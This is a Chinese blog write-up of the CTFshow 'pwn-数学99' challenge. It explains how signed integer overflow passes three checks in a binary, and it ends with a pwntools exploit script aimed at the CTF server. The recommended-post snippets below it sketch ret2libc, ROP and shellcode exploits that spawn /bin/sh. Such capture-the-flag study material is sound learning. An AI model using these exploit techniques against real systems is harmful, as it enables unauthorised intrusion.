CTFSHOW|pwn-数学99-wp

最新推荐文章于 2025-06-10 11:41:28 发布
原创 最新推荐文章于 2025-06-10 11:41:28 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细介绍了如何使用64位IDA进行程序分析,通过检查保护机制、预览程序和逐个理解main函数内的条件函数,成功找出获取flag的条件。在sub_9C0()中确定了输入a=8, b=4294967295,sub_AEE()中找到48145*89209满足条件,而在sub_BA3()中发现可能的输入组合。最后提供了EXP代码来交互执行这些步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.检查保护机制

2.我们用64位的IDA打开该文件

 查找关键字符串看到有“cat flag”

3.我们先预览一遍程序

main函数

 我们看到要if语句里面的三个函数条件为真

第一个函数

第二个函数

第三个函数

 

在第三个函数里面条件为真就可以拿到flag(handler)

4.第一个函数:sub_9C0()

 条件:

 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1

所以8 -(-1)= 9

我们就可以输入a = 8        b = 4294967295 = -1

5.第二个函数:sub_AEE()

条件:

 因为输入的v2,v3是有符号数的int型:0~2147483647 -2147483648~-1

 所以我们可以让3 * 3 = 9

4294967305 = 9

 4294967305因式分解后为:48145*89209

 网址:tools.jb51.net/jisuanqi/factor_calc

6.第三个函数: sub_BA3()

条件:

 因为v2,v3是有符号数的int型:0~2147483647 -2147483648~-1

 所以: a = 2147483648        b = -1

或    : a =-2147483648        b = -1 

程序无法执行

7.EXP

#encoding = utf-8
from pwn import * 

context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('pwn2')
	else:
		p = remote('pwn.challenge.ctf.show',28090)
	
	p.sendlineafter("a:",'8')
	p.sendlineafter("b:",'4294967295')
	
	p.sendlineafter("a:",'48145')
	p.sendlineafter("b:",'89209')
	
	p.sendlineafter("a:",'-2147483648')
	p.sendlineafter("b:",'-1')
	p.interactive()
main()

CTFshow-PWN-栈溢出(pwn65 详细版)
Welcome To Myon'Blog !
07-14 1293
摘要:该64位程序存在PIE保护,包含RWX段,通过read读取用户输入作为shellcode执行。程序会对输入字符进行严格检查,仅允许大小写字母、数字及部分符号(ASCII 48-90)。利用alpha3工具将原始shellcode编码为符合要求的ASCII字符,通过rax寄存器执行。最终成功获取flag:ctfshow{944db499-0c4a-4894-a0a5-3f7aeccec7de}。关键点包括字符过滤机制分析和alpha3编码技术的应用。
ctfshow pwn wp
Chandra的学习之路
11-26 1054
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
ctfshow web入门99
m0_73303597的博客
01-11 751
自用
ctfshow 基础pwn wp
n1ptune__的博客
05-29 831
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
CTFSHOW 36D杯CTF(pwn部分wp
weixin_44296844的博客
05-04 2055
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
ctfshow pwn1
qq_39980610的博客
08-19 464
pwn1
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
CTFshow-PWN-栈溢出(pwn50)
最新发布
Welcome To Myon'Blog !
06-10 204
摘要:本文描述了一个64位程序的ROP攻击过程。通过gets函数溢出,利用ret2libc技术,先使用puts函数泄露真实地址,找到gadgets(pop rdi;ret和ret指令)。攻击分两步:首先构造payload泄露puts函数地址,计算libc基址;然后组合system和/bin_sh地址实施攻击,最终成功获取flag(ctfshow{11ba423c-006e-429f-9ebd-9fb219f3611f})。整个过程涉及动态链接库地址计算和ROP链构造技术。
CTFshow-PWN-栈溢出(pwn46)
Welcome To Myon'Blog !
06-09 251
摘要:本文介绍了CTF比赛中一个栈溢出漏洞的利用过程。通过puts函数泄露真实地址,使用ret2libc技术计算偏移,最终获取shell。利用脚本包含两个payload:第一个泄露puts地址并计算libc基址,第二个调用system("/bin/sh")。成功获取flag:ctfshow{d495bd39-34c0-49a5-bbfa-e0468786ccdb}。文中展示了完整的Python PWN工具利用代码。
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow刷题记录web89-99
Charon_____ajsh的博客
09-15 432
ctfshow刷题记录
2023CTFSHOW愚人杯部分WP
qq_42585535的博客
04-04 900
call_user_func**来RCE。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5548
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow php特性 web99
Kradress的博客
12-14 777
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 22:36:12 # @link: https://ctfer.com */ highlight_file(__FILE__); $allow = array(); //$allow
ctf题库-FLAG
热门推荐
miko2018的博客
08-21 1万+
&lt;题目&gt; FLAG 请输入 FLAG,下面的页面会告诉你 FLAG 是否正确 解题链接: http://ctf5.shiyanbar.com/qwctf/flag-checker.html &lt;解答&gt; 打开连接。发现是一个对话框。 任意输入一个值后,提示“wrong…”,也就是说只有输入正确的值才能获得flag。 ※在Chrome下使用ctrl...
LitCTF PWN题解
ctfpwn的博客
06-02 866
接下来就是正常的64位ret2libc过程,找一个pop寄存器和ret地址,用这条指令:ROPgadget --binary pwn --only 'pop|ret'看看c伪代码,很容易看出是ret2libc题,并且对read读入的数据有一个strlen的判断,如果大于0x50就跳出。直接nc之后ls查看一下目录,看到一个dockerfile,cat一下就能发现打开flag文件的方式。然后通过给的libc文件计算偏移,得到system函数和/bin/sh字符串的地址。咳咳,接下来是正题。
CTFshow-pwn入门-前置基础pwn29-pwn31
你们de4月天的博客
06-21 2078
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
ctfshow-pwn新手系列
ro4lsc的博客
06-14 1万+
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值